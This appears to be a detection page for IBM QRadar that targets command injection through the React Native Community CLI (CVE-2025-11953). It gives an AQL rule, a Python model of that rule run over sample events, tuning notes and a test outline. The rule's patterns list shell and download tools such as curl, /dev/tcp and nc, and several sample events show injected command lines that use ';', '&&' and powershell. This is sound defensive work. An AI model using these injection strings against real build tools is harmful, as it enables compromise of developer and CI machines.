Detect React Native Community CLI OS Command Injection (CVE-2025-11953) in IBM QRadar

Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.

MITRE ATT&CK

Tactics: Execution, Persistence, Lateral Movement

QRadar Detection Query

IBM QRadar (QRadar), AQL:
SELECT DATEFORMAT(starttime,'YYYY-MM-dd HH:mm:ss') AS EventTime,
       sourceip, destinationip, username, "Process Name", "Command",
       CASE
         WHEN "Command" ILIKE '%curl %' OR "Command" ILIKE '%wget %' THEN 'RemoteDownload'
         WHEN "Command" ILIKE '%bash -i%' OR "Command" ILIKE '%sh -c%' THEN 'ShellExec'
         WHEN "Command" ILIKE '%powershell%' OR "Command" ILIKE '%cmd /c%' THEN 'WindowsExec'
         WHEN "Command" ILIKE '%/dev/tcp%' OR "Command" ILIKE '%nc %' THEN 'ReverseShell'
         ELSE 'InjectionMetachar'
       END AS InjectionType
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Linux OS', 'Microsoft Windows Security Event Log', 'SyslogNG')
  AND (
    "Command" ILIKE '%react-native%'
    OR "Command" ILIKE '%@react-native-community%'
    OR "Process Name" ILIKE '%react-native%'
  )
  AND (
    "Command" ILIKE '%curl %' OR "Command" ILIKE '%wget %'
    OR "Command" ILIKE '%bash -%' OR "Command" ILIKE '%sh -c%'
    OR "Command" ILIKE '%powershell%'
    OR "Command" ILIKE '%/dev/tcp%' OR "Command" ILIKE '%nc %'
    OR ("Command" LIKE '%&%' AND "Command" LIKE '%;%')
  )
LAST 7 DAYS
Severity: high. Confidence: medium.

QRadar AQL query identifying events, over the last 7 days, where a command line or process name referencing the React Native Community CLI also contains either a shell or download utility (curl, wget, bash, sh -c, powershell, nc, /dev/tcp) or the OS command injection metacharacters `&` and `;` together. The CASE expression labels each hit with the kind of shell activity observed (remote download, shell execution, Windows execution, reverse shell, or bare metacharacters).
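To see which command lines the rule above does and does not match, here is an added Python model of its WHERE and CASE logic run over constructed process-creation events (example code written for this page, not the page's own rule or IBM code; the event field names and sample commands are assumptions). It also surfaces one tuning gap: the `'%nc %'` pattern matches the `rsync ` substring.

```python
LOG_SOURCES = {"Linux OS", "Microsoft Windows Security Event Log", "SyslogNG"}

# CASE branches from the query, in order; the first matching label wins.
INJECTION_TYPES = [
    ("RemoteDownload", ("curl ", "wget ")),
    ("ShellExec", ("bash -i", "sh -c")),
    ("WindowsExec", ("powershell", "cmd /c")),
    ("ReverseShell", ("/dev/tcp", "nc ")),
]
# Second AND-group of the WHERE clause (note: 'bash -' here, 'bash -i' in the CASE).
SHELL_INDICATORS = ("curl ", "wget ", "bash -", "sh -c", "powershell", "/dev/tcp", "nc ")


def classify(event):
    """Return the InjectionType the rule would assign, or None if the event is not matched."""
    if event["log_source"] not in LOG_SOURCES:
        return None
    cmd, proc = event["command"].lower(), event["process_name"].lower()  # ILIKE semantics
    if not ("react-native" in cmd or "@react-native-community" in cmd or "react-native" in proc):
        return None
    metachars = "&" in cmd and ";" in cmd  # ("Command" LIKE '%&%' AND "Command" LIKE '%;%')
    if not (any(s in cmd for s in SHELL_INDICATORS) or metachars):
        return None
    for label, patterns in INJECTION_TYPES:
        if any(p in cmd for p in patterns):
            return label
    return "InjectionMetachar"


def run_rule(events):
    """Apply the rule to a batch; return (id, InjectionType) for each matching event."""
    return [(e["id"], classify(e)) for e in events if classify(e)]


# Constructed process-creation events (assumed field names, not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "log_source": "Linux OS", "process_name": "node",  # ordinary build: no hit
     "command": "node ./node_modules/.bin/react-native run-android --variant=release"},
    {"id": 2, "log_source": "Linux OS", "process_name": "sh",  # child shell from Test 1
     "command": 'sh -c "react-native init demo; id > /tmp/cve_2025_11953_poc.txt"'},
    {"id": 3, "log_source": "Linux OS", "process_name": "sh",  # Test 3 style download
     "command": 'sh -c "react-native bundle --platform android && curl http://example.invalid/x"'},
    {"id": 4, "log_source": "Microsoft Windows Security Event Log", "process_name": "cmd.exe",
     "command": "cmd /c react-native init app & powershell -NoProfile -Command whoami"},
    {"id": 5, "log_source": "Linux OS", "process_name": "node",  # metacharacters only
     "command": "node react-native-cli init proj; echo a & echo b"},
    {"id": 6, "log_source": "Linux OS", "process_name": "node",  # benign: 'rsync ' contains 'nc '
     "command": "react-native bundle --entry-file index.js && rsync -a dist/ build/"},
    {"id": 7, "log_source": "AWS CloudTrail", "process_name": "sh",  # out-of-scope log source
     "command": 'sh -c "react-native init demo; id"'},
]
```

Event 1 shows that a parent `node` command line with only a `;` is not enough on its own; the rule fires on the spawned `sh -c` child, which is why the Testing Methodology below expects process-creation telemetry for the shell, not just for node.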

Data Sources

  • QRadar Linux OS log source
  • QRadar Windows Security log source
  • Syslog

Required Tables

events

False Positives & Tuning

  • Legitimate CI/CD pipelines running on QRadar-monitored hosts where react-native CLI is part of mobile build workflows.
  • Developer machines with complex npm scripts that chain shell commands.
  • Security scanning tools that run react-native CLI as part of SAST/DAST toolchains.
  • Monorepo orchestration tools invoking react-native CLI alongside other shell utilities.

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Command injection via React Native CLI project name argument

    Expected signal: Process create event showing node spawning sh or bash with a command line containing the injected semicolon-delimited id command; file creation event for /tmp/cve_2025_11953_poc.txt.

  2. Test 2: Reverse shell injection via React Native CLI on Linux

    Expected signal: Process create events for node → sh → id; file write to /tmp/rn_inject_test.txt containing the output of id.

  3. Test 3: Remote payload download via injected curl in React Native CLI build context

    Expected signal: Process create event for node spawning sh, which spawns curl with an external URL argument; network connection event for curl to destination host.

  4. Test 4: Windows PowerShell injection via React Native CLI on Windows

    Expected signal: Sysmon Event ID 1 showing node.exe spawning cmd.exe which spawns powershell.exe; file creation event in %TEMP% for rn_inject_test.txt.

Unlock Pro Content

Get the full detection package for CVE-2025-11953 including response playbook, investigation guide, and atomic red team tests.
